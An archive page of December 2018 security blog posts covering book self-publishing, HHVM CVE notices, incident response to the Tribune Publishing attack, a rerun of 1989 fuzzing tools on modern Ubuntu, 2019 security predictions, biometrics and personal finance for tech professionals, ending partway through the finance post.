Monthly Archives: December 2018

Notes on Self-Publishing a Book

In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. Fourteen years is an eternity in the publishing world, and even in the last five years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettlebells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

CVE-2018-6340 (hhvm)

The Memcache::getextendedstats function can be used to trigger an out-of-bounds read. Exploiting this issue requires control over memcached server hostnames and/or ports. This affects all supported versions of HHVM (3.30 and 3.27.4 and below).

NBlog Jan 1 – putting resilience on the agenda

Resilience means bending not breaking, surviving issues or incidents that might otherwise be disastrous. Resilient things aren’t necessarily invulnerable, but they are definitely not fragile. Under extreme stress, their performance degrades gracefully but, mostly, they just keep on going ... like we do.

In the 15 years since we launched the NoticeBored service, we've survived emigrating to New Zealand, the usual ups and downs of business plus the Global Financial Crisis. Lately we're seeing an upturn in sales as customers release the strangle-holds on their awareness and training budgets ... and invest in becoming more resilient to survive future challenges.  

The following snippet from the Financial Conduct Authority's new report "Cyber and Technology Resilience" caught my beady eye in the course of researching and writing January's materials:

The NoticeBored service supplies top-quality creative content for security awareness and training programs on a market-leading range of topics, with parallel streams of material aimed at the workforce in general plus managers and professionals specifically. Getting all three audiences onto the same page and encouraging interaction is a key part of socializing information risk and security, promoting the security culture.

'Resilience' is the 189th NoticeBored awareness and training module and the 67th topic in our bulging portfolio. If your security awareness and training program is limited to basic topics such as viruses and passwords, with a loose assortment of materials forming an unsightly heap, it's no wonder your employees are bored stiff. A dull and uninspiring program achieves little value, essentially a waste of money. Furthermore, if it only addresses "end users" and "cybersecurity" i.e. just IT security, again you're missing a trick. Resilience, for example, has profound implications for the entire business and beyond, with supply chains and stakeholders to consider. Resilient computing is just part of it.

For a highly cost-effective approach, read about January's NoticeBored security awareness and training module on resilience and get in touch to subscribe. I'm not just talking about the 'disappointing' 10% of financial companies apparently lacking an awareness program (!) but all organizations, including those of you who already get it and have something running. As we plummet towards 2020, seize the opportunity and ear-mark a tiny sliver of budget to energize your organization's approach to security awareness and training with NoticeBored. We're keen to help you toughen-up, making 2019 a happy, resilient and secure year ahead. Make security awareness your new year's resolution.

Happy new year!

New Year Tips from Security Professionals

New Year Tips from Security Professionals

Have you included website security as a part of your new year’s resolutions for 2019?

Here is a quick retrospective on tips some of our team members shared with us throughout the year.

The cost of neglecting security is 10 times greater than the effort of keeping it safe, and your brand value takes 10 times as long to recover as it took to build. Make sure to follow security best practices to protect your web assets.

Continue reading New Year Tips from Security Professionals at Sucuri Blog.

CVE-2018-6335 (hhvm)

A malformed h2 frame can cause a 'std::out_of_range' exception when parsing priority metadata. This behavior can lead to denial of service. This affects all supported versions of HHVM (3.25.2, 3.24.6, and 3.21.10 and below) when using the proxygen server to handle HTTP2 requests.

Incident Response In The Public Eye

Cyberattacks happen constantly. Every day, organizations are attacked online whether they realize it or not. Most of these attacks are passing affairs. The mere fact that systems are connected to the internet makes them a target of opportunity. For the most part, these attacks are non-events.

Security software, bugs in attack code, and updated applications stop most attacks. With 20 billion+ devices connected to the internet, it’s easy enough for the attacker to move on.

But every couple of weeks there is a big enough attack to draw headlines. You’ve seen a steady stream of them over the past few years. 10 million records here, thousands of systems there, and so on.

When we talk about these attacks, for most people, it’s an abstract discussion. It’s hard to visualize an abstract set of data that lives online somewhere.

The recent attack on the Tribune Publishing network is different. This attack had a real world impact. Around the United States, newspapers arrived late and missing significant sections of content.


Late Thursday, some systems on the Tribune Publishing network were inaccessible. This is not an uncommon experience for anyone working in a large organization.

Technology has brought about many wonders but reliability isn’t typically one of them. When a system is inaccessible, it’s not out of the question to first think, “Ugh, this isn’t working. Call IT.”

Support tickets are often the first place cyberattacks show up…in retrospect. All public signs in the Tribune Publishing attack point this way. Once support realized the extent of the issue and that it involved malware, the event—a support request—turned into an incident. This kicks off an incident response (IR) process.

It’s this process that the teams at Tribune Publishing are dealing with now.


“Who is behind the attack?” is the first question on everyone’s mind. It’s human nature—doubly so at a media organization—to want to understand the “who” and “why” as opposed to the “how”.

The reality is that for the incident response process, that’s a question that wastes time. The goal of the incident response process is to limit damage to the organization and to restore systems as fast as possible.

In that context, the response team only needs to roughly classify their attacker. Is the attacker:

  1. A low level cybercriminal who got lucky with an automated attack and has few resources to continue or sustain the attack?
  2. A cybercriminal intending on attacking a specific class of organization or systems?
  3. A cybercriminal targeting your organization?

Knowing which class of cybercriminal is behind the attack will help dictate the effort required in your response.

For a simple attack, your automated defences should take care of it. Even after an initial infection, a defence-in-depth strategy will isolate the attack and make recovery straightforward.

If the attack is part of a larger campaign (e.g., WannaCry, NotPetya, etc.), incident response is more complex but the same principles hold true. The third class of attacker—specifically targeting your organization—is what causes a change in the process. Now you are defending against an adversary who is actively changing their approach. That requires a completely different mindset compared to other responses.

The Process

Incident response processes generally follow six stages:

  1. Prepare
  2. Identify
  3. Contain
  4. Eradicate
  5. Recover
  6. Learn

On paper the process looks simple. Preparation begins with teams gathering contact information, tools, and by writing out—or better yet, automating—procedures.

Once an incident has started, teams work to identify affected systems and the type of attack. They then contain the attack to prevent it from spreading, and work to eradicate any trace of it.

Once the attack is over, the work shifts to recovering systems and data to restore functionality. Afterwards, an orderly review is conducted and lessons are shared about what worked and what didn’t.

Easy, right?

Any incident responders reading this post can take a minute here, having enjoyed a good laugh. The next section slams everyone back to the harsh reality of IR.


The six phases of incident response look great on paper but when you’re faced with implementing them in the real world, things never work out so cleanly.

The majority of a response is spent stuck in a near-endless loop: identifying new areas of compromise in order to contain the attack, hopefully allowing responders to eradicate any foothold and recover the affected systems.

This is what most organizations struggle with. The time spent preparing is often insufficient because it’s all theoretical. Combined with the rapid pace of change on the network, this means teams struggle to keep up during an active incident.

With an organization like Tribune Publishing, things are even more difficult. By its very nature, it’s a 24/7 business with a wide variety of users around the country. This means there are a lot of systems to consider, and each hour of downtime has a very real and significant impact on the bottom line.

As the incident progresses, the response team will make critical decision after critical decision. Shutting down various internal services to protect them. Changing network structures to isolate malicious activity. And a host of other challenges will pop up during the incident.

It’s difficult, hard-driving work, made doubly so with the eyes of senior management, customers, and the general public looking on.


As a CISO or incident response team leader, you need to focus on the IR process, not on attribution. That’s why it’s worrisome to see early attribution during an incident.

In the Tribune Publishing attack, it was publicly reported that the attack came from outside of the United States. This led to speculation about motivation. It’s likely that statement was based on the malware reportedly found and simple IP address information.

Early in the IR process, evidence like this will be found. It’s easily accessible but also highly unreliable. Malware is often sold in the digital underground and IP addresses are easily spoofed or proxied. The response team knows this but pressure from higher up may demand some form of answer…whether or not it helps resolve the situation.

The team must stay focused on resolving the incident, not spend valuable time and energy getting sidetracked. Attribution has its place. It’s definitely not in the middle of the response to an incident.


The one hard truth of incident response is that nothing can substitute for experience. Given the—hopefully obvious—fact that you don’t actually want to be attacked, this leads to the concept of a game day or an active simulation.

Popular in cloud environments—AWS runs game days at their events—these exercises provide hands-on experience. Usually held for the operations team, they are of critical importance to the security team as well.

Security doesn’t operate in a vacuum, especially during an incident. Working with other teams during an incident is key, and practicing that way is a must. This type of work is a huge effort, but one that will pay off significantly when an organization is attacked.

Next Steps

Tribune Publishing was hit by a cyberattack with real world impact. This level of visibility is a stark reminder of how challenging these situations can be. The most critical phase of incident response is the first one: preparation.

As a CISO or senior security team member, you need to prepare more than just the incident response plan. With a plan in hand, you need to get other teams on board and make it clear to senior management how this process works. Critical to success is making sure that management knows that the priority is recovery…not attribution.

Combine that with a lot of practice and when the next incident hits, you’ll have put your team in a reasonable position to respond and recover quickly.


Fuzzing Like It’s 1989

With 2019 a day away, let’s reflect on the past to see how we can improve. Yes, let’s take a long look back 30 years and reflect on the original fuzzing paper, An Empirical Study of the Reliability of UNIX Utilities, and its 1995 follow-up, Fuzz Revisited, by Barton P. Miller.

In this blog post, we are going to find bugs in modern versions of Ubuntu Linux using the exact same tools as described in the original fuzzing papers. You should read the original papers not only for context, but for their insight. They proved to be very prescient about the vulnerabilities and exploits that would plague code over the decade following their publication. Astute readers may notice the publication date for the original paper is 1990. Even more perceptive readers will observe the copyright date of the source code comments: 1989.

A Quick Review

For those of you who didn’t read the papers (you really should), this section provides a quick summary and some choice quotes.

The fuzz program works by generating random character streams, with the option to generate only printable, control, or non-printable characters. The program uses a seed to generate reproducible results, which is a useful feature modern fuzzers often lack. A set of scripts execute target programs and check for core dumps. Program hangs are detected manually. Adapters provide random input to interactive programs (1990 paper), network services (1995 paper), and graphical X programs (1995 paper).

The 1990 paper tests four different processor architectures (i386, CVAX, Sparc, 68020) and five operating systems (4.3BSD, SunOS, AIX, Xenix, Dynix). The 1995 paper has similar platform diversity. In the first paper, 25-33% of utilities fail, depending on the platform. In the 1995 follow-on, the numbers range from 9%-33%, with GNU (on SunOS) and Linux being by far the least likely to crash.

The 1990 paper concludes that (1) programmers do not check array bounds or error codes, (2) macros make code hard to read and debug, and (3) C is very unsafe. The extremely unsafe gets function and C’s type system receive special mention. During testing, the authors discover format string vulnerabilities years before their widespread exploitation (see page 15). The paper concludes with a user survey asking about how often users fix or report bugs. Turns out reporting bugs was hard and there was little interest in fixing them.

The 1995 paper mentions open source software and includes a discussion of why it may have fewer bugs. It also contains this choice quote:

When we examined the bugs that caused the failures, a distressing phenomenon emerged: many of the bugs discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995. …

The techniques used in this study are simple and mostly automatic. It is difficult to understand why a vendor would not partake of a free and easy source of reliability improvements.

It would take another 15-20 years for fuzz testing to become standard practice at large software development shops.

I also found this statement, written in 1990, to be prescient of things to come:

Often the terseness of the C programming style is carried to extremes; form is emphasized over correct function. The ability to overflow an input buffer is also a potential security hole, as shown by the recent Internet worm.

Testing Methodology

Thankfully, after 30 years, Dr. Miller still provides full source code, scripts, and data to reproduce his results, which is a commendable practice that more researchers should emulate. The scripts and fuzzing code have aged surprisingly well. The scripts work as-is, and the fuzz tool required only minor changes to compile and run.

For these tests, we used the scripts and data found in the fuzz-1995-basic repository, because it includes the most modern list of applications to test. As per the top-level README, these are the same random inputs used for the original fuzzing tests. The results presented below for modern Linux used the exact same code and data as the original papers. The only thing changed is the master command list to reflect modern Linux utilities.

Updates for 30 Years of New Software

Obviously there have been some changes in Linux software packages in the past 30 years, although quite a few tested utilities still trace their lineage back several decades. Modern versions of the same software audited in the 1995 paper were tested, where possible. Some software was no longer available and had to be replaced. The justification for each replacement is as follows:

  • cfe → cc1: This is a C preprocessor, equivalent to the one used in the 1995 paper.
  • dbx → gdb: This is a debugger, equivalent to the one used in the 1995 paper.
  • ditroff → groff: ditroff is no longer available.
  • dtbl → gtbl: A GNU Troff equivalent of the old dtbl utility.
  • lisp → clisp: A Common Lisp implementation.
  • more → less: Less is more!
  • prolog → swipl: There were two choices for Prolog: SWI Prolog and GNU Prolog. SWI Prolog won out because it is an older and more comprehensive implementation.
  • awk → gawk: The GNU version of awk.
  • cc → gcc: The default C compiler.
  • compress → gzip: GZip is the spiritual successor of the old Unix compress.
  • lint → splint: A GPL-licensed rewrite of lint.
  • /bin/mail → /usr/bin/mail: This should be an equivalent utility at a different path.
  • f77 → fort77: There were two possible choices for a Fortran77 compiler: GNU Fortran and Fort77. GNU Fortran is recommended for Fortran 90, while Fort77 is recommended for Fortran77 support. The f2c program is actively maintained, and its changelog entries date back to 1989.


The fuzzing methods of 1989 still find bugs in 2018. There has, however, been progress.

Measuring progress requires a baseline, and fortunately, there is a baseline for Linux utilities. While the original fuzzing paper from 1990 predates Linux, the 1995 re-test uses the same code to fuzz Linux utilities on the 1995 Slackware 2.1.0 distribution. The relevant results appear on Table 3 of the 1995 paper (pages 7-9). GNU/Linux held up very well against commercial competitors:

The failure rate of the utilities on the freely-distributed Linux version of UNIX was second-lowest at 9%.

Let’s examine how the Linux utilities of 2018 compare to the Linux utilities of 1995 using the fuzzing tools of 1989:

                Ubuntu 18.10   Ubuntu 18.04   Ubuntu 16.04   Ubuntu 14.04      Slackware 2.1.0
                (2018)         (2018)         (2016)         (2014)            (1995)
Crashes         1 (f77)        1 (f77)        2 (f77, ul)    2 (swipl, f77)    4 (ul, flex, indent, gdb)
Hangs           1 (spell)      1 (spell)      1 (spell)      2 (spell, units)  1 (ctags)
Total Tested    81             81             81             81                55
Crash/Hang %    2%             2%             4%             5%                9%

Amazingly, the Linux crash and hang count is still not zero, even for the latest Ubuntu release. The f2c program called by f77 triggers a segmentation fault, and the spell program hangs on two of the test inputs.

What Are The Bugs?

There are few enough bugs that I could manually investigate the root cause of some issues. Some results, like a bug in glibc, were surprising while others, like an sprintf into a fixed-sized buffer, were predictable.

The ul crash

The bug in ul is actually a bug in glibc. Specifically, it is an issue reported here and here (another person triggered it in ul) in 2016. According to the bug tracker, it is still unfixed upstream, but since the issue cannot be triggered on Ubuntu 18.04 and newer, it appears to have been fixed at the distribution level. From the bug tracker comments, the core issue could be very serious.

f77 crash

The f77 program is provided by the fort77 package, which itself is a wrapper script around f2c, a Fortran77-to-C source translator. Debugging f2c reveals the crash is in the errstr function when printing an overly long error message. The f2c source reveals that it uses sprintf to write a variable length string into a fixed sized buffer:

errstr(const char *s, const char *t)
{
  char buff[100];
  sprintf(buff, s, t);  /* unbounded write into a 100-byte buffer */
}

This issue looks like it’s been a part of f2c since inception. The f2c program has existed since at least 1989, per the changelog. A Fortran77 compiler was not tested on Linux in the 1995 fuzzing re-test, but had it been, this issue would have been found earlier.

The spell Hang

This is a great example of a classical deadlock. The spell program delegates spell checking to the ispell program via a pipe. The spell program reads text line by line and issues a blocking write of line size to ispell. The ispell program, however, will read at most BUFSIZ/2 bytes at a time (4096 bytes on my system) and issue a blocking write to ensure the client received spelling data processed thus far. Two different test inputs cause spell to write a line of more than 4096 characters to ispell, causing a deadlock: spell waits for ispell to read the whole line, while ispell waits for spell to acknowledge that it read the initial corrections.

The units Hang

Upon initial examination this appears to be an infinite loop condition. The hang looks to be in libreadline and not units, although newer versions of units do not suffer from the bug. The changelog indicates some input filtering was added, which may have inadvertently fixed this issue. While a thorough investigation of the cause and correction was out of scope for this blog post, there may still be a way to supply hanging input to libreadline.

The swipl Crash

For completeness I wanted to include the swipl crash. However, I did not investigate it thoroughly, as the crash has been long-fixed and looks fairly benign. The crash is actually an assertion (i.e. a thing that should never occur has happened) triggered during character conversion:

[Thread 1] pl-fli.c:2495: codeToAtom: Assertion failed: chrcode >= 0
C-stack trace labeled "crash":
  [0] __assert_fail+0x41
  [1] PL_put_term+0x18e
  [2] PL_unify_text+0x1c4

It is never good when an application crashes, but at least in this case the program can tell something is amiss, and it fails early and loudly.


Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.

I hope you have enjoyed this 30-year retrospective. Be on the lookout for the next installment of this series: Fuzzing In The Year 2000, which will investigate how Windows 10 applications compare against their Windows NT/2000 equivalents when faced with a Windows message fuzzer. I think that you can already guess the answer.

The End (of 2018) Is Near: Looking Back for Optimism

Prognostication is risky business. Just days after I originally put together my list of predictions for the cybersecurity world of 2019, Marriott, Dell, Dunkin’ and Quora trashed my carefully crafted analysis.

This is further evidence that predicting events and issues based on unpredictable human behaviors is like picking your spouse on a blind date. Sure, you might be right, but you are just as likely to make a disastrous choice.

This time last year, I gazed deeply into my company’s Crystal Ball, read the tea leaves in my cup, and boldly predicted five circumstances. Three of them came true in full force:

  1. Government regulations would drive behaviors. The reaction to GDPR, NY DFS, CaCPA, CaSCD and serious talk of a US federal privacy law is proof that institutional behaviors are changing and will continue to do so.
  2. Patching will be the Achilles heel of applications. Known CVEs continued to be the root cause of cyberattacks.
  3. More of the same problems as in previous years – a no brainer, unfortunately, since organizations still get caught doing stupid things (cough) Cathay Pacific (cough).

I’m claiming partial credit for the two other 2018 predictions: “Out-of-support software is the next frontier for attacks” and “IoT and Ransomware attacks will (still) be a threat” – and I’m updating them for 2019.

A list of 2019 predictions could easily include all of the same predictions as 2018, but that implies we are not making headway in solving the primary issues that security teams face every day. The reality is, though, we are making progress against cyberattacks. 

Despite the recent meme-inspiring breaches that added more than 600 million records to the wild, the number of breaches reported in 2018 will be down significantly for the first time since 2011. That didn’t happen by accident.

Businesses are accelerating efforts to address the root cause of most cyberattacks – known but unpatched CVEs – more rapidly and efficiently. Research released late in 2018 proves it: an average of 321 hours (roughly $20K) per week is spent patching CVEs, and 30% of the most severe CVEs are now patched within 30 days, a double-digit improvement.

The number of reported CVEs is also likely to finish the year flat to slightly down for the first time in four years, based on stats from the National Vulnerability Database. This too is evidence that the testing tools and the focus on improving the development process are working. Here again, automation has great potential to turn a one-year change in direction into a trend.

Progress, though, is not always linear or steady. While we wait to see if 2018 is a one-off or a movement, let’s look at what to expect in 2019. 

  1. Fewer data breaches… 
    If the current trends hold true to the end of 2018, we will see the first year-over-year drop in reported data losses since 2011. 

  2. …but bigger data losses.
    The number of security breaches may be down, but the size of data losses per attack is growing. Even adjusting for the 2017 Equifax and the 2018 Marriott breaches, the number of records lost per attack/breach will double in 2018. Expect that trend to continue into 2019.

  3. Unpatched vulnerabilities will get you media attention you don’t want.
    The latest numbers from The Ponemon Institute tell the story: security leaders around the world say that manual patching processes create risk – yet they continue to invest in headcount instead of automated tools like runtime virtual patches that can fix, not just patch, known code flaws with no downtime. Ponemon calls this the Patching Paradox.

  4. The security and compliance risks from Legacy Java applications only get bigger.
    Depending on whose measuring stick you use, Java 8 accounts for between 79 percent and 84 percent of Java-based applications, with a little more than 40 percent still being written in Java 6 or Java 7! With no backwards compatibility in Java 11, enterprises with legacy apps (which is most organizations) face a dilemma: what to do with out-of-support but mission-critical applications?

  5. More of the same with a touch of “Huh?”
    In a world where SQL injection and cross-site scripting vulnerabilities continue to plague between 30 and 50 percent of all applications, we’re going to see more of the same in 2019. But there will be surprises, too, says Captain Obvious. It could be that ransomware attacks will shift from primarily end-point vulnerabilities to server threats. Will we see a surge in DDoS attacks linked to the IoT after a year of relative calm in 2018? And what about critical infrastructure attacks from for-profit hackers and nation-states?

The Institute of Operations Management advises that “there are two types of forecasts: lucky or wrong.” Let’s reconvene in a year to see which we are.

About the author: James E. Lee is the Executive Vice President and Global CMO at Waratek. He is the former CMO at data pioneer ChoicePoint and an expert in data privacy and security, having served nine years on the Board of the San Diego-based Identity Theft Resource Center, including three years as Chair. Lee has served as a leader of two ANSI efforts to address issues of data privacy and identity management.

Copyright 2010 Respective Author at Infosec Island

Q&A: Experian exec says biometrics won’t save you from mobile hacks

If you think your new iPhone's Face ID facial recognition feature or your bank's fancy new fingerprint scanner will guarantee privacy and block hackers from accessing sensitive personal or financial data, think again.

In the coming year, cyberattacks will zero in on biometric hacking and expose vulnerabilities in touch ID sensors, facial recognition technology and passcodes, according to a new report from credit reporting agency Experian Plc. While biometric data is considered the most secure method of authentication, it can be stolen or altered, and sensors can be manipulated, spoofed or suffer deterioration with too much use.

Even so, as much as 63% of enterprises have implemented or plan to roll out  biometric authentication systems to augment or replace less-secure passwords, Experian said in its report. The push toward biometric systems dates back to the turn of the century in the financial services industry.


10 Personal Finance Lessons for Technology Professionals


When you boil it down, what do those three things have in common? Those are choices.
Money is not peace of mind.
Money’s not happiness.
Money is, at its essence, that measure of a man’s choices.

This is part of the opening monologue of the Ozark series and when I first heard it, I immediately stopped the show and dropped it into this blog post. It's a post that has been many years coming, one I started drafting about 5 years ago. One I kept dropping little bits and pieces into as the years went by but never finished because the time just wasn't right. It was only after reflecting on the responses to the following tweet that I decided to sit down and finally wrap up this post:

This is a measure of my choices. Of my wife's choices. Of a couple of decades of choices. The car itself is only one small part of that measure, but it was the enthusiasm that tweet was met with by many who expressed a desire to do the same one day that prompted me to finish the post. It's also the negativity expressed by a small few about my choosing to spend our money in this way that prompted me to finish it; those who feel success itself or its manifestation into physical goods is somehow taboo. The latter group won't get anything useful from this post, but it was never meant for them. It was always meant for those who wanted the measure of their own choices to look more like the one above.

So here it is - 10 Personal Financial Lessons for Technology Professionals.

Intro: This Industry Rocks!

I want to start here because this post is very specifically targeted at people working in the same industry as I do. There'll be many things which I hope are useful to those outside of that, but frankly, those of us in tech have a massive advantage when it comes to our ability to be financially successful. I don't just mean at the crazy rich end of the scale (4 of the world's top 10 richest people did it in tech - Bezos, Gates, Zuckerberg and Ellison), but at all levels of our profession. In fact, those guys are all pretty good examples of the ability to build amazing things from the ground up and I'm sure that many of you reading this have sat down and started building something with the same enthusiasm as, say, Zuckerberg did with Facebook in 2004. Of course, success at that level is exceptionally rare, but my point is that in this industry more than any other I can think of, we can create amazing things from very humble beginnings.

But of more relevance to most of us is the opportunities this industry affords the masses. It's one you can get involved in at almost any age (I started both my kids coding at 6 years old), it provides endless opportunities to learn for very little or even free (the vast majority of my own programming education has come via free online resources) and it transcends borders and socioeconomic barriers like few others (think of the opportunities it grants people in emerging markets). It's also up there with the highest paying industries around. I think we all know that innately but it's worth putting into raw numbers; I pulled a report from July put together by Australia's largest employment marketplace (SEEK) which has some great stats. For example, the ICT industry (Information, Communication, Technology) was the 5th highest paying with an average salary of $104,874 (dollars are Aussie, take off about 30% for USD). Number 1 is "Mining, Resources & Energy" which had a local boom here but is now rapidly declining (down 14% on the previous year). Take mining out of the picture and the top industry ("Consulting & Strategy"), pays only 5% more than tech. Look the other way down the list and the next highest industry is "Legal", a whole $9k a year behind. Banking is below that. Medical even lower.

Then there's this:

Today, the Information & Communication Technology (ICT) industry dominates, with salaries from six roles within the industry featuring in the top 20.

The highest salary SEEK has on the books is for architects (the tech kind, not the construction industry kind) at $138k. The third highest is tech industry management roles at $132k. Of course, actual numbers will differ in other parts of the world and indeed across other reports, plus there are many roles in the industry that will pay much less than those (especially during our earlier years). The point is that the tech industry provides people with near unparalleled earning potential across one's career. And it gives them the ability to do so much younger in life than many others do and with much less formal education; I care much more about skills than degrees in tech people, but my doctor / lawyer / pilot better have a heap of formal qualifications from many years of study behind them!

This is a cornerstone of what I'm going to write in this post: technology professionals have a much greater ability to earn more than most other industries and to do so at a young age. Being smart with that money early on gives them an opportunity to leverage it into even greater things again. Keep that in mind because I'll come back to it in lesson 2 but firstly, let's just be clear about why all this is important.

Lesson 1: Money Buys Choices

Let me be crystal clear about this in the very first lesson: money is not about owning a Ferrari and living in a mansion. It's not about expensive jewellery and designer clothes. No, money is about choices. It's about having choices such that you can decide to spend it on what's important to you. That may mean helping out family members, donating to local charities or retiring early so that you can spend more time with your partner and kids. And yes, if it's important to you, it may also mean spending it on luxury items and that's fine because that's your choice! It's a choice you get to make with money as opposed to one that is forced upon you without it.

Let me share some examples of what I mean from my own personal experiences and I hope they cover a broad enough spectrum to resonate with everyone in one way or another. Just over 2 years ago, my wife (Kylie) had spinal surgery. You can read her experiences in that post but in a nutshell, it wasn't much fun and it followed many months of pain due to disc degeneration. The choice that money gave us was to focus on her treatment and recovery without stressing about her needing to work. We said to each other many times "how on earth would we have dealt with this if she still had a full-time job?" and invariably the answer is always that we couldn't have: the job would have gone.

Kylie wasn't working when her back went because we chose not to. She left a very successful corporate role in late 2014 and very shortly after, my own corporate job was made redundant. We never really consciously decided that she shouldn't go back to work, but a series of events including her being fed up with corporate life and us deciding to move interstate meant that she never did (although she's continued consulting on an ad hoc basis). Money gave us that choice. It was a choice that meant one or both of us is always there for the kids in the morning, always waiting to pick them up after school and always there for every tennis match, friend's birthday party or other random kid thing that seems to happen on a near daily basis. Being able to make those choices has enabled us to spend more time together as a family. It's quite literally bought us family time in many different ways, particularly in recent years.

Which leads me to the "but money can't buy happiness" position so many people have repeated over the years. Bull. Shit. Anyone who has ever said that simply doesn't know where to shop. Putting aside the intangible things money buys such as those already covered above, money spent on physical items can bring people a huge amount of pleasure. I'm not a fashion guy (pick almost any talk I've done and you'll see it's jeans and t-shirts all the way), but I totally understand how presenting well can bring a lot of joy to people. Obviously I am a car guy and vehicles such as the one at the beginning of this post and the Nissan GT-R I bought back in 2013 have brought me enormous pleasure. I smile every time I drive either and the latter in particular has resulted in so many immensely enjoyable interactions with people; kids taking pictures, adults wanting to chat and without exception, positive responses from everyone who sees it. Now mind you, some of the most fun times I've had have been in previous cars a fraction of the price, so I'm by no means trying to imply a direct correlation between cost and happiness; the point I'm making is simply that tangible items that cost money can bring a huge amount of happiness, but only if you have the choice to obtain them.

I'm very conscious of the fact that for some people, signs of wealth lead to resentment. There was some of that in response to the Mercedes tweet earlier on and in Australia, we'd refer to that as tall poppy syndrome. (I'm still at a loss as to why anyone would take the time to explicitly tell you how displeased they are with your happiness; some people just lose their minds when they're behind a keyboard.) I also touched on this when I first did my Hack Your Career talk in Norway last year where they refer to it as Janteloven (video embedded at the point where I describe it):

For the purposes of this first lesson, I don't care whether someone feels this way or not but regardless of your position, the one thing you should take away from this is that money enables you to choose what's important to you, whatever that may be. That's the mindset you need to take as you progress through this post.

Lesson 2: The Money You Earn Young is the Most Valuable Money You'll Ever Earn

Let's start with a graph and it's one you may have seen before, or at least some interpretation of the same sort of data:

[Image: Vanguard's 2018 Index Chart]

This is Vanguard's 2018 Index Chart and you can either drill down into it and pore over the details or just take one simple truth away from a glance at it: investments grow over time. I know, revolutionary, right? Now to be fair, some investments tank and others skyrocket but more important than the minutiae are the overall market forces that enable money to multiply over time. We're looking at 30 years here and $10k invested back in 1988 would be worth almost $59k today invested at cash rates (6.1%), nearly $85k if put into international shares or over $206k if invested in US shares (and that includes the GFC period). There's also CPI at work which makes that $10k worth less today than it was 3 decades ago, but that's tracked at 2.8% per annum which is a damn sight less than a balanced portfolio earns.
